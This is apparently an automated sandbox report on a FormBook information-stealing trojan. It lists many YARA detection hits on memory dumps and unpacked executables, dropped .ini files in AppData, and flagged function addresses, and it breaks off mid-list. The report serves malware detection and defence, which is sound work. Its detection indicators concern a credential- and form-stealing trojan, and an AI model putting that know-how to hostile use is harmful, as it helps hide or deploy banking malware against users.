48 69 67 47 79 37 64 6c 28 59 39 5f 6b 72 44 4f 64 44 56 61 38 4a 58 55 6d 58 31 74 65 38 42 38 49 51 49 45 4e 47 35 4e 4e 34 75 44 71 59 7a 62 6c 73 58 56 44 4c 63 45 74 78 35 41 4b 6a 36 6e 65 31 58 6a 42 73 56 31 6d 31 31 71 59 52 73 59 58 74 6c 48 55 6d 61 56 4a 58 76 4b 44 39 7a 61 75
 Urls found in memory or binary data Show sources

E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE

System Summary:

 Detected FormBook malware Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.ini Jump to dropped file Source: C:\Windows\SysWOW64\WWAHost.exe Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrf.ini Jump to dropped file Source: C:\Windows\SysWOW64\WWAHost.exe Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrv.ini Jump to dropped file
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.1229429028.00000000038EF000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402566 0_2_00402566 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402538 0_2_00402538 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_004078F0 1_2_004078F0 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_0041B1CB 1_2_0041B1CB Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_0041AB60 1_2_0041AB60 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_00419D48 1_2_00419D48 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_00419F03 1_2_00419F03 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E826F8 1_2_06E826F8 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E73E96 1_2_06E73E96 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E7CE66 1_2_06E7CE66 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DD7640 1_2_06DD7640 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE5E70 1_2_06DE5E70 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE4E61 1_2_06DE4E61 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE6611 1_2_06DE6611 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E81FCE 1_2_06E81FCE Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DD5790 1_2_06DD5790 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E72782 1_2_06E72782 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E81746 1_2_06E81746 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E744EF 1_2_06E744EF Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E7DCC5 1_2_06E7DCC5 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E82C9A 1_2_06E82C9A Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E81C9F 1_2_06E81C9F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E73490 1_2_06E73490 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE547E 1_2_06DE547E Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E6F42B 1_2_06E6F42B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DD1410 1_2_06DD1410 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DC740C 1_2_06DC740C Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E61DE3 1_2_06E61DE3 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E7D5D2 1_2_06E7D5D2 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E6FDDB 1_2_06E6FDDB Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E7E581 1_2_06E7E581 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E5E58A 1_2_06E5E58A Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DB0D40 1_2_06DB0D40 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E5C53F 1_2_06E5C53F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DD1530 1_2_06DD1530 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E82519 1_2_06E82519 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E71D1B 1_2_06E71D1B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E822DD 1_2_06E822DD Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DD42B0 1_2_06DD42B0 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E81A99 1_2_06E81A99 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE4A5B 1_2_06DE4A5B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE523D 1_2_06DE523D Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E70A02 1_2_06E70A02 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E8E214 1_2_06E8E214 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE63C2 1_2_06DE63C2 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DBEBE0 1_2_06DBEBE0 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE4B96 1_2_06DE4B96 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DDFB40 1_2_06DDFB40 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E828E8 1_2_06E828E8 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE48CB 1_2_06DE48CB Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E618B6 1_2_06E618B6 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DCA080 1_2_06DCA080 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE1070 1_2_06DE1070 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE9810 1_2_06DE9810 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E7D016 1_2_06E7D016 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DEE020 1_2_06DEE020 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE0021 1_2_06DE0021 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E819E2 1_2_06E819E2 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E761DF 1_2_06E761DF Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E8D9BE 1_2_06E8D9BE Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE6180 1_2_06DE6180 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE594B 1_2_06DE594B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06DE7110 1_2_06DE7110 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 1_2_06E09906 1_2_06E09906 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0340FB40 3_2_0340FB40 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034163C2 3_2_034163C2 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03414B96 3_2_03414B96 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_033EEBE0 3_2_033EEBE0 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03414A5B 3_2_03414A5B Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034A0A02 3_2_034A0A02 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034BE214 3_2_034BE214 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0341523D 3_2_0341523D Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B22DD 3_2_034B22DD Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B1A99 3_2_034B1A99 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034042B0 3_2_034042B0 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0341594B 3_2_0341594B Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03439906 3_2_03439906 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03417110 3_2_03417110 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034A61DF 3_2_034A61DF Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B19E2 3_2_034B19E2 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03416180 3_2_03416180 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034BD9BE 3_2_034BD9BE Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03411070 3_2_03411070 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03419810 3_2_03419810 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034AD016 3_2_034AD016 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03410021 3_2_03410021 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0341E020 3_2_0341E020 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034148CB 3_2_034148CB Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B28E8 3_2_034B28E8 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_033FA080 3_2_033FA080 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034918B6 3_2_034918B6 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B1746 3_2_034B1746 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B1FCE 3_2_034B1FCE Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034A2782 3_2_034A2782 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03405790 3_2_03405790 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03407640 3_2_03407640 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03414E61 3_2_03414E61 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034ACE66 3_2_034ACE66 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03415E70 3_2_03415E70 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03416611 3_2_03416611 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B26F8 3_2_034B26F8 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034A3E96 3_2_034A3E96 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034A1D1B 3_2_034A1D1B Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B2519 3_2_034B2519 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03401530 3_2_03401530 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0348C53F 3_2_0348C53F Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_033E0D40 3_2_033E0D40 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0349FDDB 3_2_0349FDDB Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034AD5D2 3_2_034AD5D2 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03491DE3 3_2_03491DE3 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0348E58A 3_2_0348E58A Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034AE581 3_2_034AE581 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_033F740C 3_2_033F740C Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 